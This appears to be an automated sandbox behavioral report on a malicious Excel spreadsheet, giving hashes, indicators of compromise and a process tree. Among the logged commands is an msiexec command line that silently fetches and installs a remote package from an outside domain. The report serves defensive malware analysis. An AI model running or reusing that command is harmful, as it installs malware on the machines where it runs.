Analysis
-
max time kernel
27s
-
max time network
17s
-
platform
windows7_x64
-
resource
win7-20240708-en
-
resource tags
arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
-
submitted
07-09-2024 21:20
Behavioral task
behavioral1
Sample
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls
Resource
win10v2004-20240802-en
General
-
Target
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls
-
Size
82KB
-
MD5
df10732c7400e5555e4f0e37fe8fbdc1
-
SHA1
4bc9edf343c7021087046021aed2eebbe1cb6ae3
-
SHA256
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b
-
SHA512
6334acc65489fdc107a8e28063ebadcf74bb710516fa70031b4bc0e846462d77bfbdb2dcc12a0ae72cd234369e1a7d27aac12123f01e931f4194072218b78fcb
-
SSDEEP
1536:oKpb8rGYrMPelwhKmFV5xtezEsgrdgrebDG7XE8rMxLgb4JSt1mGJfFacueBkgVV:oKpb8rGYrMPelwhKmFV5xtezEsgrdgw2
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Processes: msiexec.exe
description | pid | pid_target | process | target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 2636 | 2884 | msiexec.exe | EXCEL.EXE
-
Use of msiexec (install) with remote resource 1 IoCs
Processes:
Processes: msiexec.exe
pid | process
2636 | msiexec.exe
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Processes: EXCEL.EXE, msiexec.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
Processes: EXCEL.EXE
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Processes: EXCEL.EXE
pid | process
2884 | EXCEL.EXE
-
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
Processes: msiexec.exe, msiexec.exe
description | pid | process
Token: SeShutdownPrivilege | 2636 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2636 | msiexec.exe
Token: SeRestorePrivilege | 1808 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 1808 | msiexec.exe
Token: SeSecurityPrivilege | 1808 | msiexec.exe
Token: SeCreateTokenPrivilege | 2636 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 2636 | msiexec.exe
Token: SeLockMemoryPrivilege | 2636 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2636 | msiexec.exe
Token: SeMachineAccountPrivilege | 2636 | msiexec.exe
Token: SeTcbPrivilege | 2636 | msiexec.exe
Token: SeSecurityPrivilege | 2636 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2636 | msiexec.exe
Token: SeLoadDriverPrivilege | 2636 | msiexec.exe
Token: SeSystemProfilePrivilege | 2636 | msiexec.exe
Token: SeSystemtimePrivilege | 2636 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 2636 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 2636 | msiexec.exe
Token: SeCreatePagefilePrivilege | 2636 | msiexec.exe
Token: SeCreatePermanentPrivilege | 2636 | msiexec.exe
Token: SeBackupPrivilege | 2636 | msiexec.exe
Token: SeRestorePrivilege | 2636 | msiexec.exe
Token: SeShutdownPrivilege | 2636 | msiexec.exe
Token: SeDebugPrivilege | 2636 | msiexec.exe
Token: SeAuditPrivilege | 2636 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 2636 | msiexec.exe
Token: SeChangeNotifyPrivilege | 2636 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 2636 | msiexec.exe
Token: SeUndockPrivilege | 2636 | msiexec.exe
Token: SeSyncAgentPrivilege | 2636 | msiexec.exe
Token: SeEnableDelegationPrivilege | 2636 | msiexec.exe
Token: SeManageVolumePrivilege | 2636 | msiexec.exe
Token: SeImpersonatePrivilege | 2636 | msiexec.exe
Token: SeCreateGlobalPrivilege | 2636 | msiexec.exe
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
Processes: EXCEL.EXE
pid | process
2884 | EXCEL.EXE
2884 | EXCEL.EXE
2884 | EXCEL.EXE
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
Processes: EXCEL.EXE
description | pid | process | target process
PID 2884 wrote to memory of 2636 | 2884 | EXCEL.EXE | msiexec.exe
PID 2884 wrote to memory of 2636 | 2884 | EXCEL.EXE | msiexec.exe
PID 2884 wrote to memory of 2636 | 2884 | EXCEL.EXE | msiexec.exe
PID 2884 wrote to memory of 2636 | 2884 | EXCEL.EXE | msiexec.exe
PID 2884 wrote to memory of 2636 | 2884 | EXCEL.EXE | msiexec.exe
PID 2884 wrote to memory of 2636 | 2884 | EXCEL.EXE | msiexec.exe
PID 2884 wrote to memory of 2636 | 2884 | EXCEL.EXE | msiexec.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (level 1)
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 2884
-
C:\Windows\SysWOW64\msiexec.exe (level 2, child of EXCEL.EXE)
Command line: msiexec.exe RESTART=1 /i http://zonaykan.com/lsadat2 /q ADRESS=TEMP
- Process spawned unexpected child process
- Use of msiexec (install) with remote resource
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID: 2636
-
C:\Windows\system32\msiexec.exe (level 1)
Command line: C:\Windows\system32\msiexec.exe /V
- Suspicious use of AdjustPrivilegeToken
PID: 1808